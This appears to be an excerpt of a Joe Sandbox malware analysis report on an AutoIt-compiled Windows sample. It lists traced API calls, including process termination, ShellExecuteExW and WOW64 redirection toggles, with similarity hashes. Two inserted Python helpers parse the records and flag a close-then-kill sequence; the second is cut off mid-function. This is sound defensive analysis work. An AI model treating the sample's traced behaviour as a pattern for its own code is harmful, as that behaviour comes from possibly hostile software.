                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                            • String ID:
                                                                                                            • API String ID: 43455801-0
                                                                                                            • Opcode ID: 5efcc055334c31b720025aa8afbb8e8652555319ac17a8a60f275714a52f1682
                                                                                                            • Instruction ID: 4bf4a8a8fec615512121e4c1096208dfbe5f6e6ddb5ede030c052c1881bd463e
                                                                                                            • Opcode Fuzzy Hash: 5efcc055334c31b720025aa8afbb8e8652555319ac17a8a60f275714a52f1682
                                                                                                            • Instruction Fuzzy Hash: 6411CC7600024DFFDF12AF95DC88E9A7F6DEB04394F048061FA199A1A1C7719D56DB70
                                                                                                            APIs
                                                                                                            • GetDC.USER32(00000000), ref: 00DB5218
                                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 00DB5229
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DB5230
                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00DB5238
                                                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00DB524F
                                                                                                            • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00DB5261
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsDevice$Release
                                                                                                            • String ID:
                                                                                                            • API String ID: 1035833867-0
                                                                                                            • Opcode ID: 18bcefe779b29594ed870ba54a04b528066dcceccea1f5fb3a67bce6ae753618
                                                                                                            • Instruction ID: 7f7a6be6e57aa957241e18ff035c2892612b40cb8bea637d1ef6f4363f9ae360
                                                                                                            • Opcode Fuzzy Hash: 18bcefe779b29594ed870ba54a04b528066dcceccea1f5fb3a67bce6ae753618
                                                                                                            • Instruction Fuzzy Hash: 7B014F75A01758BBEB10ABE59C89B5EBFB8EF48751F044065FA05EB391D6709801CBB0
                                                                                                            APIs
                                                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D51BF4
                                                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00D51BFC
                                                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D51C07
                                                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D51C12
                                                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00D51C1A
                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D51C22
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Virtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4278518827-0
                                                                                                            • Opcode ID: f4fc85c5f26ba173bc0708e0de38a98ffa07f2743613ae66ce0bc216e8b5df2a
                                                                                                            • Instruction ID: f03dbf30139d0e57485b2dfbe905839d25bb5307e4ab85e6775e634c6c0e3cf0
                                                                                                            • Opcode Fuzzy Hash: f4fc85c5f26ba173bc0708e0de38a98ffa07f2743613ae66ce0bc216e8b5df2a
                                                                                                            • Instruction Fuzzy Hash: D30148B09027597DE3009F5A8C85A52FFA8FF19354F00411B915C4BA41C7B5A864CBE5
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00DBEB30
                                                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00DBEB46
                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00DBEB55
                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DBEB64
                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DBEB6E
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DBEB75
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 839392675-0
                                                                                                            • Opcode ID: d9789e6e2e557c06deb8a99188b70e754bdabcae1f583374d269b6e31034f6d7
                                                                                                            • Instruction ID: 6b1edd5d2cfc6fa19c8e09ea2c6dbdec65b28d62c615377d63a4ac0a648526ef
                                                                                                            • Opcode Fuzzy Hash: d9789e6e2e557c06deb8a99188b70e754bdabcae1f583374d269b6e31034f6d7
                                                                                                            • Instruction Fuzzy Hash: ACF03072250298BBE72167529C4DEEF3A7CEFCAB11F001158FA01D5291D7A05A02C6B5
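The call sequence in the record above (PostMessageW and SendMessageTimeoutW with message 0x10, then OpenProcess with access mask 0x1F0FFF and TerminateProcess) is a graceful-close-then-kill pattern: 0x10 is WM_CLOSE and 0x1F0FFF is PROCESS_ALL_ACCESS. The Python below is an added triage helper, not part of Joe Sandbox or of the sample. It parses lines in the report's `• Api.MODULE(args), ref: addr` format (the format is assumed from the listing, including the `Part of subcall function` prefix and the parenthesis-less CRT entries), decodes the constants that appear in these records (the MapVirtualKeyW virtual-key codes, WM_CLOSE, PROCESS_ALL_ACCESS), and flags the close-then-terminate sequence. The embedded sample is constructed from lines copied out of the records on this page, with the trailing stack-residue arguments trimmed.

```python
"""Parse Joe Sandbox-style 'APIs' listings and flag notable call sequences.

Added example for triaging the function records in this report; it is not
Joe Sandbox code and not code from the sample. The line format is assumed
from the listing; the constant names are standard Win32 definitions.
"""
import re
from dataclasses import dataclass, field

# Constructed sample: lines copied from the records on this page, with the
# stack-residue arguments after the real parameters trimmed off.
SAMPLE = """\
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00DBEB30
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00DBEB46
• GetWindowThreadProcessId.USER32(?,?), ref: 00DBEB55
• OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00DBEB64
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00DBEB6E
• CloseHandle.KERNEL32(00000000), ref: 00DBEB75
  • Part of subcall function 00D69639: SelectObject.GDI32(?,00000000), ref: 00D696A2
• _free.LIBCMT ref: 00D82DAB
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D51BF4
• MapVirtualKeyW.USER32(00000011,00000000), ref: 00D51C1A
"""

# One report line: optional subcall prefix, Api.MODULE, optional (args), ref: addr
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Constants seen in these records (Win32 definitions)
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",
            0x5B: "VK_LWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}
WM_CLOSE = 0x0010
PROCESS_ALL_ACCESS = 0x1F0FFF
MESSAGE_APIS = ("PostMessageW", "SendMessageW", "SendMessageTimeoutW")


@dataclass
class Call:
    api: str
    module: str
    args: list = field(default_factory=list)  # int for hex literals, None for '?'
    ref: int = 0


def parse_args(text):
    """Turn '?,00000010,-00000002' into [None, 0x10, -2]."""
    out = []
    for a in (text or "").split(","):
        a = a.strip()
        if not a:
            continue
        if a == "?":
            out.append(None)
        elif a.startswith("-"):
            out.append(-int(a[1:], 16))
        else:
            out.append(int(a, 16))
    return out


def parse_listing(text):
    """Parse every matching bullet line; unrelated lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            calls.append(Call(m["api"], m["module"], parse_args(m["args"]), int(m["ref"], 16)))
    return calls


def describe(call):
    """Render a call with the constants it uses named, e.g. MapVirtualKeyW [VK_LWIN]."""
    notes = []
    if call.api == "MapVirtualKeyW" and call.args and call.args[0] in VK_NAMES:
        notes.append(VK_NAMES[call.args[0]])
    if call.api in MESSAGE_APIS and len(call.args) > 1 and call.args[1] == WM_CLOSE:
        notes.append("WM_CLOSE")
    if call.api == "OpenProcess" and call.args and call.args[0] == PROCESS_ALL_ACCESS:
        notes.append("PROCESS_ALL_ACCESS")
    label = f"{call.api}.{call.module} @ {call.ref:08X}"
    return label + (f"  [{', '.join(notes)}]" if notes else "")


def find_close_then_kill(calls):
    """True if a WM_CLOSE is sent, then the target is opened with
    PROCESS_ALL_ACCESS and terminated, in that order within one record."""
    saw_close = False
    saw_open_all = False
    for c in calls:
        if c.api in MESSAGE_APIS and len(c.args) > 1 and c.args[1] == WM_CLOSE:
            saw_close = True
        elif c.api == "OpenProcess" and c.args and c.args[0] == PROCESS_ALL_ACCESS:
            saw_open_all = saw_close
        elif c.api == "TerminateProcess" and saw_open_all:
            return True
    return False


if __name__ == "__main__":
    parsed = parse_listing(SAMPLE)
    for c in parsed:
        print(describe(c))
    print("close-then-kill sequence:", find_close_then_kill(parsed))
```

Run against a whole report export, the parser gives you the call list per function record; the sequence check is the kind of rule worth keeping alongside the report's own signatures, since the individual calls are benign in isolation and only the ordering within one function is telling.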
                                                                                                            APIs
                                                                                                            • GetClientRect.USER32(?), ref: 00DA7452
                                                                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 00DA7469
                                                                                                            • GetWindowDC.USER32(?), ref: 00DA7475
                                                                                                            • GetPixel.GDI32(00000000,?,?), ref: 00DA7484
                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00DA7496
                                                                                                            • GetSysColor.USER32(00000005), ref: 00DA74B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 272304278-0
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00DB187F
                                                                                                            • UnloadUserProfile.USERENV(?,?), ref: 00DB188B
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00DB1894
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00DB189C
                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00DB18A5
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00DB18AC
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 146765662-0
                                                                                                            APIs
                                                                                                            • __Init_thread_footer.LIBCMT ref: 00D5BEB3
                                                                                                            Similarity
                                                                                                            • API ID: Init_thread_footer
                                                                                                            • String ID: D%$D%$D%$D%
                                                                                                            • API String ID: 1385522511-2722557190
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D57620: _wcslen.LIBCMT ref: 00D57625
                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00DBC6EE
                                                                                                            • _wcslen.LIBCMT ref: 00DBC735
                                                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00DBC79C
                                                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00DBC7CA
                                                                                                            Similarity
                                                                                                            • API ID: ItemMenu$Info_wcslen$Default
                                                                                                            • String ID: 0
                                                                                                            • API String ID: 1227352736-4108050209
                                                                                                            APIs
                                                                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 00DDAEA3
                                                                                                              • Part of subcall function 00D57620: _wcslen.LIBCMT ref: 00D57625
                                                                                                            • GetProcessId.KERNEL32(00000000), ref: 00DDAF38
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00DDAF67
                                                                                                            Similarity
                                                                                                            • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                            • String ID: <$@
                                                                                                            • API String ID: 146682121-1426351568
                                                                                                            APIs
                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00DB7206
                                                                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00DB723C
                                                                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00DB724D
                                                                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00DB72CF
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                            • String ID: DllGetClassObject
                                                                                                            • API String ID: 753597075-1075368562
                                                                                                            APIs
                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DE3E35
                                                                                                            • IsMenu.USER32(?), ref: 00DE3E4A
                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00DE3E92
                                                                                                            • DrawMenuBar.USER32 ref: 00DE3EA5
                                                                                                            Similarity
                                                                                                            • API ID: Menu$Item$DrawInfoInsert
                                                                                                            • String ID: 0
                                                                                                            • API String ID: 3076010158-4108050209
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                              • Part of subcall function 00DB3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00DB3CCA
                                                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00DB1E66
                                                                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00DB1E79
                                                                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00DB1EA9
                                                                                                              • Part of subcall function 00D56B57: _wcslen.LIBCMT ref: 00D56B6A
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$_wcslen$ClassName
                                                                                                            • String ID: ComboBox$ListBox
                                                                                                            • API String ID: 2081771294-1403004172
                                                                                                            APIs
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen
                                                                                                            • String ID: HKEY_LOCAL_MACHINE$HKLM
                                                                                                            • API String ID: 176396367-4004644295
APIs
• SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00DE2F8D
• LoadLibraryW.KERNEL32(?), ref: 00DE2F94
• SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00DE2FA9
• DestroyWindow.USER32(?), ref: 00DE2FB1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: MessageSend$DestroyLibraryLoadWindow
• String ID: SysAnimate32
• API String ID: 3529120543-1011021900
• Opcode ID: a3a9ab88ca4378501acb21d143af1e08df97dcc874560a4b68f2a344ca05e0af
• Instruction ID: 07c5deed6121d682292ea439807b388ef6cf468c74f8231dd755a9c13141b22e
• Opcode Fuzzy Hash: a3a9ab88ca4378501acb21d143af1e08df97dcc874560a4b68f2a344ca05e0af
• Instruction Fuzzy Hash: 2421AC72600285ABEB206F66DC81FBB37BDEF59368F140228FA50D61A0D771DC919770
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D74D1E,00D828E9,?,00D74CBE,00D828E9,00E188B8,0000000C,00D74E15,00D828E9,00000002), ref: 00D74D8D
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D74DA0
• FreeLibrary.KERNEL32(00000000,?,?,?,00D74D1E,00D828E9,?,00D74CBE,00D828E9,00E188B8,0000000C,00D74E15,00D828E9,00000002,00000000), ref: 00D74DC3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: e18c5c4fe2d0d3340e84fdb32c090d30426aa49f16b709f4b77d9d755b903472
• Instruction ID: 9039570f2c502211f6059a67171bb205af8ea0e286ed277d6a14191c853de6e6
• Opcode Fuzzy Hash: e18c5c4fe2d0d3340e84fdb32c090d30426aa49f16b709f4b77d9d755b903472
• Instruction Fuzzy Hash: 0AF03134550358AFDB116F90DC49BADBFB5EB44751F054094A90DE6250DB305945CAA0
APIs
• LoadLibraryA.KERNEL32 ref: 00DAD3AD
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00DAD3BF
• FreeLibrary.KERNEL32(00000000), ref: 00DAD3E5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: GetSystemWow64DirectoryW$X64
• API String ID: 145871493-2590602151
• Opcode ID: 877c91f7298e537bbe44e1c2dc0f32a448e56f7f3a58cf77cccb0bdf0fd29497
• Instruction ID: d61056507635f70b6ae6dff04baf55e26abf05c06857b22863afae0d974ed00d
• Opcode Fuzzy Hash: 877c91f7298e537bbe44e1c2dc0f32a448e56f7f3a58cf77cccb0bdf0fd29497
• Instruction Fuzzy Hash: C4F05530801B219BCB306B108C88AA93322BF12B01B59A068F887F6A14DB30CD84C6B6
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D54EDD,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54E9C
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D54EAE
• FreeLibrary.KERNEL32(00000000,?,?,00D54EDD,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54EC0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 145871493-3689287502
• Opcode ID: 4bf7f72647e4131257da9691a05bb42b544fda1dfd441073e4198e7b52fe7eed
• Instruction ID: 6f946ef540772b23acff06cfa8bb0e640bb803e44b8f20e4d650c48f8b9aef3c
• Opcode Fuzzy Hash: 4bf7f72647e4131257da9691a05bb42b544fda1dfd441073e4198e7b52fe7eed
• Instruction Fuzzy Hash: 40E0CD35E117225FD6312B256C1DB5F6554AF82F677091115FC04E7300DF60CD4741B2
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D93CDE,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54E62
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D54E74
• FreeLibrary.KERNEL32(00000000,?,?,00D93CDE,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54E87
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
• API String ID: 145871493-1355242751
• Opcode ID: 158605af7534828aee45067e7d0b30f56d759c3716f51ee85cd0695ba914f0c3
• Instruction ID: d8baf82db4176228edd62cff670a4108f22f4569db9d60023d6660e7acdc3d84
• Opcode Fuzzy Hash: 158605af7534828aee45067e7d0b30f56d759c3716f51ee85cd0695ba914f0c3
• Instruction Fuzzy Hash: A4D0C231912B615B4A222B256C09D8F2A18AF81F163091114BC15E6210CF20CD4681F1
APIs
• GetCurrentProcessId.KERNEL32 ref: 00DDA427
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00DDA435
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 00DDA468
• CloseHandle.KERNEL32(?), ref: 00DDA63D
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: Process$CloseCountersCurrentHandleOpen
• String ID:
• API String ID: 3488606520-0
• Opcode ID: a1910af215a85124cee3e4ce7c2aac491bc701644b6bc35e0b02febdb1a454ca
• Instruction ID: f6c6cee7d903424cd1c513c4718d71ae8f548156b93af0cda2b8f05eeda0fbae
• Opcode Fuzzy Hash: a1910af215a85124cee3e4ce7c2aac491bc701644b6bc35e0b02febdb1a454ca
• Instruction Fuzzy Hash: 36A180716043019FD720DF28D886F2AB7E5EF84714F14885DF9999B392DB70EC458BA1
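The API lists in these function records are what an analyst actually triages, and the raw arguments are only useful once decoded (the OpenProcess call in the record above passes an access mask of 00000410). The following Python is an added example, not part of the Joe Sandbox report or its tooling: it parses records in the plain-text layout shown on this page into structured calls and decodes the OpenProcess access mask against the documented PROCESS_* constants from winnt.h. The sample record is constructed from this page's own lines; the parser assumes the `API.MODULE(args), ref: ADDR` layout (with optional `Part of subcall function` prefix) and that arguments contain no nested parentheses.

```python
"""Parse Joe Sandbox 'APIs' records and decode OpenProcess access masks.

Added example (not Joe Sandbox code). Assumes the plain-text record layout
seen in the report: a bullet, API.MODULE(args), and ', ref: ADDR'.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: API lines copied from the report's record layout,
# including one 'Part of subcall function' line from a later record.
SAMPLE_RECORD = """APIs
• GetCurrentProcessId.KERNEL32 ref: 00DDA427
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00DDA435
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 00DDA468
• CloseHandle.KERNEL32(?), ref: 00DDA63D
  • Part of subcall function 00DBDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?), ref: 00DBDDFD
"""

# Process access rights as documented for OpenProcess (winnt.h values).
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x00100000: "SYNCHRONIZE",
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list          # raw argument tokens; '?' means unresolved in the trace
    ref: int            # address of the call site
    subcall_of: Optional[int] = None  # set for 'Part of subcall function' lines


LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z0-9_]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def parse_api_lines(text: str) -> list[ApiCall]:
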